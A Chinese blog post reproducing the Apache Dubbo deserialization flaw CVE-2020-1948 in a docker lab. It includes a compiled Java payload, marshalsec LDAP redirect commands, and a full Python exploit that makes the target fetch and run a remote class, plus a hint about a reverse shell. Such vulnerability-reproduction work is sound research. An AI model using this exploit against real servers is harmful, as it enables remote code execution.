Apache Dubbo 反序列化-(CVE-2020-1948)

最新推荐文章于 2023-06-27 15:09:50 发布
最新推荐文章于 2023-06-27 15:09:50 发布
阅读量387 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: dubbo apache web安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tamchikit/article/details/128545304
版权

漏洞编号

  • CVE-2020-1948

靶机环境

  • docker环境 dsolab/dubbo:cve-2020-1948,启动镜像

docker run -p 12345:12345 dsolab/dubbo:cve-2020-1948 -d

0x00 漏洞简介

2020年6月23日,Apache Dubbo公布了一个反序列化导致的远程代码执行漏洞(CVE-2020-1948)。

Apache Dubbo 是一款高性能Java RPC框架。漏洞存在于 Apache Dubbo默认使用的反序列化工具 hessian 中,攻击者可能会通过发送恶意 RPC 请求来触发漏洞,这类 RPC 请求中通常会带有无法识别的服务名或方法名,以及一些恶意的参数负载。当恶意参数被反序列化时,达到代码执行的目的。

0x01 漏洞影响

2.7.0 <= Dubbo Version <= 2.7.6

2.6.0 <= Dubbo Version <= 2.6.7

Dubbo 所有 2.5.x 版本(官方团队目前已不支持)

0x02 漏洞限制

暂无

0x03 复现过程

漏洞复现

准备exp文件,编写exp.java如下

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;
 
public class exp {
    public exp(){
        try {
            java.lang.Runtime.getRuntime().exec("touch /tmp/success");
        } catch (java.io.IOException e) {
            e.printStackTrace();
        }
    }
}

编译java文件

使用python在该目录启动HttpServer

下载marshalsec-jar

git clone https://github.com/RandomRobbieBF/marshalsec-jar.git

使用marshalsec-jar启动LDAP代理服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.127.129/#exp 777

执行python exp

python3 exp.py 192.168.127.129 12345 ldap://192.168.127.129:777/exp

可以看到通过LDAP代理重定向去访问了之前编译的exp.class文件

进入容器,可以看到我们在/tmp目录下成功创建了success文件,说明漏洞利用成功

可以尝试修改exp.py命令执行,比如反弹shell或者用dnslog探查漏洞。

PoC/Exp

# -*- coding: utf-8 -*-
  
import sys
 
from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient
 
if len(sys.argv) < 4:
  print('Usage: python {} DUBBO_HOST DUBBO_PORT LDAP_URL'.format(sys.argv[0]))
  print('\nExample:\n\n- python {} 1.1.1.1 12345 ldap://1.1.1.6:80/exp'.format(sys.argv[0]))
  sys.exit()

 
client = DubboClient(sys.argv[1], int(sys.argv[2]))
 
 
JdbcRowSetImpl=new_object(
  'com.sun.rowset.JdbcRowSetImpl',
  dataSource=sys.argv[3],
  strMatchColumns=["foo"]
  )
JdbcRowSetImplClass=new_object(
  'java.lang.Class',
  name="com.sun.rowset.JdbcRowSetImpl",
  )
toStringBean=new_object(
  'com.rometools.rome.feed.impl.ToStringBean',
  beanClass=JdbcRowSetImplClass,
  obj=JdbcRowSetImpl
  )
 
 
resp = client.send_request_and_return_response(
  service_name='org.apache.dubbo.spring.boot.sample.consumer.DemoService',
  # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。
  method_name='$invoke',
  args=[toStringBean]) 
 
  
output = str(resp)
if 'Fail to decode request due to: RpcInvocation' in output:
  print('[!] Target maybe not support deserialization.')
elif 'EXCEPTION: Could not complete class com.sun.rowset.JdbcRowSetImpl.toString()' in output:
   print('[+] Succeed.')
else:
  print('[!] Output:')
  print(output)
  print('[!] Target maybe not use dubbo-remoting library.')

0x04 参考链接

tamchikit
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dubbo-exp:Dubbo反序列化一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian反序列化和java原生反序列化
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责 Dubbo反序列化测试工具 使用帮助 usage: java -jar exp.jar [OPTION] -h --help 帮助信息 -l --list 输出所有gadget信息 -g --gadget gadget名称 -a --args gadget入参,多个参数使用多次该命令传入,例-a -a Calc -p --protocol [dubbo|http] 通讯协议名称,默认缺省dubbo -s --serialization [hessian|java] 序列化类型,默认缺省hessian -t --target 目标,例:127.0.0.1:20880 -f --fas
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1357
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 677
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告
爱国小白帽
06-23 3134
CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948,漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,
Apache Dubbo CVE-2020-1948 反序列化漏洞利用
weixin_46137328的博客
07-08 2040
0x00 漏洞背景2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为CVE-2020-1948,漏洞等级:高危。...
Dubbo 序列化与反序列化
万物皆字节
05-09 2670
com.alibaba.dubbo.common.serialize.Serialization
[Timeline Sec] - CVE-2020-1948Dubbo Provider默认反序列化复现1
08-03
然而,2020年,腾讯安全团队发现了一个重要的安全漏洞,即CVE-2020-1948,这是一个Dubbo Provider默认反序列化远程代码执行漏洞。攻击者可以构造恶意请求,导致任意代码被执行。 **漏洞细节** 在受影响的Dubbo版本...
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564,Apache-Dubbo反序列化漏洞
dubbo-php-framework:适用于Apache Dubbo的php
04-22
dubbo-php-framework是用于PHP语言的RPC通讯框架。 它与Dubbo协议完全兼容,并且可以同时用作提供商终端和消费者终端。 使用zookeeper进行服务注册发现,并使用fastjson和hessian进行序列化。 介绍 php provider在多...
dubbo监控中心dubbo-monitor-simple
01-23
该包为dubbo-monitor,使用方法请参见博文 《Dubbo进阶(五)—— dubbo-monitor-simple使用》 https://blog.csdn.net/sunhuaqiang1/article/details/80141478
apache-dubbo-admin-0.4.0-bin-release 压缩包下载
05-23
这个“apache-dubbo-admin-0.4.0-bin-release”压缩包包含了用于管理和监控Dubbo服务的管理工具,专为Windows用户设计。 在了解这个压缩包之前,我们先来看看Apache Dubbo的核心特性: 1. **服务治理**:Dubbo提供...
[CVE-2020-1948]Apache Dubbo Provider默认反序列化RCE
公众号shadow sock7
06-24 5180
git clone https://github.com/apache/dubbo-spring-boot-project cd dubbo-spring-boot-project git checkout 2.7.1 -b b2.7.1 # 将整个项目dubbo-spring-boot-project导入IDEA 在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml 引入以下依赖: <d
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2330
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
Javaweb安全——Dubbo 反序列化(一)
weixin_43610673的博客
02-13 1400
Apache Dubbo 是一款 RPC 服务开发框架。智能容错和负载均衡,以及服务自动注册和发现。
关于Apache Dubbo反序列化漏洞(CVE-2023-23638)的预警提示与对应的Zookeeper版本
最新发布
u011236069的博客
06-27 1875
Apache官方发布安全公告,修复了Apache Dubbo中的一个反序列化漏洞(CVE-2023-23638)。由于Apache Dubbo安全检查存在缺陷,导致可以绕过反序列化安全检查并执行反序列化攻击,成功利用该漏洞可在目标系统上执行任意代码。Apache Dubbo 2.7.x 版本:
[CVE-2020-1948] Apache Dubbo 反序列化漏洞分析
阿道夫的博客
12-17 530
Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
Apache Dubbo CVE-2020-1948 测试环境复现
aweiweiweiei1的博客
01-26 251
https://github.com/txrw/Dubbo-CVE-2020-1948
CVE-2022-39198 Apache Dubbo Hession Deserialization分析
include_voidmain的博客
12-29 1002
我们跟进一下这种利用方式,我们这里选用的环境是单独的一个dubbo依赖的环境(2.7.16版本)沿用以前的思路,通过dubbo库依赖的fastjson库,进行任意getter方法的调用,进行调用上图中的getDefaultPrintService方法进行利用。这图是XString#equals方法中的代码,其中我们是通过HashMap反序列化的方法,进行元素之间的equals方法的调用,这里的obj2参数,只有是一个JSONObject对象,才会调用其toString方法。
dubbo反序列化导致Timestamp丢失时分秒,怎么办
06-02
这个问题是由于dubbo默认使用了Hessian2进行序列化和反序列化,而Hessian2对于java.sql.Timestamp类型的序列化存在问题,会导致反序列化后的对象中Timestamp的时分秒丢失。解决这个问题的方法是使用其他的序列化方式,比如使用Java的标准序列化方式或者使用JSON进行序列化和反序列化。具体的做法如下: 1. 使用Java的标准序列化方式 在dubbo的配置文件中,将序列化方式改为Java自带的序列化方式: ``` <dubbo:protocol name="dubbo" serialization="java" /> ``` 2. 使用JSON进行序列化和反序列化dubbo的配置文件中,将序列化方式改为fastjson或者jackson: ``` <dubbo:protocol name="dubbo" serialization="fastjson" /> ``` 或者 ``` <dubbo:protocol name="dubbo" serialization="jackson" /> ``` 其中,fastjson和jackson都是常用的JSON序列化库。使用JSON进行序列化和反序列化可以避免Hessian2对于Timestamp的序列化问题,同时还可以提高序列化和反序列化的性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值